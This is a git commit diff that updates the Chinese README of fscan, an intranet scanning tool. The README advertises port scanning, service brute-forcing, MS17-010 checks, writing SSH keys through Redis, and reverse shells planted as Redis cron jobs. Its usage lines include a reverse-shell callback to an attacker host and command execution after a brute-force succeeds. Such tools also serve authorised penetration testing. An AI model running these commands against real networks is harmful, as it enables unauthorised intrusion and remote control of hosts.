mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-07-14 05:12:36 +08:00
update
This commit is contained in:
parent
1598de6ce0
commit
83700540f5
36
README.md
36
README.md
@ -1,2 +1,36 @@
|
||||
# fscan
|
||||
一款内网扫描工具,方便一键自动化大保健。
|
||||
|
||||
一款内网扫描工具,方便一键大保健。
|
||||
支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写私钥、计划任务反弹shell、读取win网卡信息等。
|
||||
趁着最近有空,用go把f-scrack重构了一遍。使用go来编写,也有更好的扩展性及兼容性。
|
||||
还在逐步增加功能,欢迎各位师傅提意见。
|
||||
|
||||
## usege
|
||||
```
|
||||
go run main.go -h 192.168.1.1/24
|
||||
fscan.exe -h 192.168.1.1/24
|
||||
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写私钥)
|
||||
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
|
||||
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
|
||||
```
|
||||
|
||||
`fscan.exe -h 192.168.x.x`
|
||||

|
||||
|
||||
`fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写私钥)`
|
||||

|
||||
|
||||
|
||||
`fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)`
|
||||

|
||||
|
||||
|
||||
`fscan.exe -h 192.168.x.x (ms17010、读取网卡信息)`
|
||||

|
||||
|
||||
|
||||
## 参考链接
|
||||
https://github.com/Adminisme/ServerScan
|
||||
https://github.com/netxfly/x-crack
|
||||
https://github.com/hack2fun/Gscan
|
||||
https://github.com/k8gege/LadonGo
|
BIN
image/1.png
Normal file
BIN
image/1.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 418 KiB |
BIN
image/2.png
Normal file
BIN
image/2.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 434 KiB |
BIN
image/3.png
Normal file
BIN
image/3.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 488 KiB |
BIN
image/4.png
Normal file
BIN
image/4.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 143 KiB |
BIN
image/Snipaste_2020-11-13_22-51-04.png
Normal file
BIN
image/Snipaste_2020-11-13_22-51-04.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 476 KiB |
Loading…
Reference in New Issue
Block a user